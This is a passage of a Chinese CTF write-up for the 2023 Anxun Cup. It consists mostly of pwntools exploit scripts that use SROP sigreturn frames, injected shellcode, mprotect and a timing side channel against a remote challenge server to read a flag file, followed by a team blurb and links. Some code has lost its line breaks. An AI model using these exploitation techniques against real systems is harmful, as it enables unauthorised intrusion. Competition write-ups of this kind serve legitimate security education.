#libc = ELF("./libc-2.23.so")#libc = ELF("./libc.so.6")#context(arch="amd64",os="linux",log_level="debug")def s(a) : p.send(a)def sa(a, b) : p.sendafter(a, b)def sl(a) : p.sendline(a)def sla(a, b) : p.sendlineafter(a, b)def r() : return p.recv()def pr() : print(p.recv())def rl(a) : return p.recvuntil(a)def inter() : p.interactive()def get_addr():  return u64(p.recvuntil(b'x7f')[-6:].ljust(8, b'x00'))
#752leave = 0x40136csig = 0x0000000000401194sy = 0x000000000040118a#gdb.attach(p)
opena = SigreturnFrame()          opena.rax = 0                    opena.rdi = 2     opena.rsi = 0x404060                  opena.rdx = 0opena.rcx = 0               opena.rip = elf.plt['syscall']          opena.rbp = 0x404060 + 0x20      opena.rsp = 0x404170read1 = SigreturnFrame()          read1.rax = 0                    read1.rdi = 0                  read1.rsi = 3       read1.rdx = 0x404560read1.rcx = 0x30              read1.rip = elf.plt['syscall']          read1.rbp = 0x404060 + 0x20         read1.rsp = 0x404170+(0x404170-0x404060)-8write = SigreturnFrame()          write.rax = 0                    write.rdi = 1                  write.rsi = 1       write.rdx = 0x404560write.rcx = 0x30             write.rip = elf.plt['syscall']          write.rbp = 0x404060 + 0x20       write.rsp = 0x404170+(0x404170-0x404060)sla("easyhack",b'./flagx00x00'+p64(sig)+p64(sy)+flat(opena)+p64(sig)+p64(sy)+flat(read1)+p64(sig)+p64(sy)+flat(write))
sla("SUID?",b'a'*(0x2a)+p64(0x404060)+p64(leave))
p.interactive()

side_channel,initiate!

from pwn import *
context.log_level = 'ERROR'context.terminal = ['wt.exe', 'wsl.exe', 'bash', '-c']context.binary = './chall'binary = context.binary
REMOTE = args.REMOTE or 1
syscall = 0x40118Abss = 0x404060FLAG = '/flag'
code = shellcraft.open(FLAG, 'O_RDONLY', 'rdx')code += shellcraft.read(3, bss+0xE00, 0x100)code += '''    xor eax, eax    mov rdi, 0    mov rsi, 0x404F60    mov rdx, 2    syscall
    movzx rcx, byte ptr [0x404F60]    movzx rax, byte ptr [0x404F61]    movzx rbx, byte ptr [0x404E60+rcx]    cmp rax, rbx    jge L_HANG    jmp L_EXITL_HANG:    xor eax, eax    mov rdi, 0    mov rsi, 0x404F60    mov rdx, 1    syscallL_EXIT:
'''code += shellcraft.exit(0)
shellcode = asm(code)
def test(idx, ch):    if REMOTE:        p = remote('47.108.206.43', 37910)    else:        p = process('./chall')
    pay1 = shellcode    pay1 = pay1.ljust(0x100, b'A')    pay1 += b'A'*0x8    pay1 += p64(0x401193)    pay1 += p64(syscall)
    frame = SigreturnFrame()    frame.rax = constants.SYS_mprotect    frame.rdi = 0x404000    frame.rsi = 0x1000    frame.rdx = 7    frame.rsp = bss+0x210    frame.rip = 0x401186    pay1 += bytes(frame)    pay1 += p64(0x404060)
    # gdb.attach(p, 'b *0x40118E')    # sleep(1)
    p.sendafter(b"easyhackn", pay1)    p.recvline()        payload = b'A'*0x2A    payload += p64(bss+0x100)    payload += p64(0x401441) # level; ret    p.send(payload)    p.send(p8(idx)+bytes([ch]))        t = time.time()    p.clean(0.3)    t = time.time()-t    p.close()    print(t)    return t > 0.28

flag = ""for i in range(len(flag), 36):    l = 0x2D    r = 0x66    while l < r:        mid = (l+r)//2        res = test(i, mid)        if res:            r = mid        else:            l = mid+1        print(l, r, chr(l), chr(r))    flag += chr(l)    print(flag)
print('flag{'+flag+'}')

FOOTER

团队简介：

山海关安全团队(www.shg-sec.com)是一支专注网络安全的实战型团队，队员均来自国内外各大高校与企事业单位，主要从事漏洞挖掘、情报分析、反涉网犯罪研究。Arr3stY0u战队与W4ntY0u预备队隶属于CTF组，我们积极参与各大网络安全竞赛，欢迎你的加入~

原文始发于微信公众号（山海之关）：2023 第六届安洵杯 writeup by Arr3stY0u

左青龙
微信扫一扫

右白虎
微信扫一扫

2023 第六届安洵杯 writeup by Arr3stY0u

2024鹅厂游戏安全技术竞赛决赛题解-PC客户端

官方赛题解析 | 对抗研判 AVSS 挑战赛 2024 线上选拔赛

[Meachines][Easy] Usage

【CTF】leak canary

CTF中的普通sql注入题分析

2024FIC第四届全国网络空间取证竞赛线上初赛全解参考wp

2024第四届FIC初赛Writeup

2024腾讯游戏安全大赛-安卓赛道决赛VM分析与还原

2024第四届FIC初赛Writeup

2023某省电子取证比武wp

发表评论

在线咨询

微信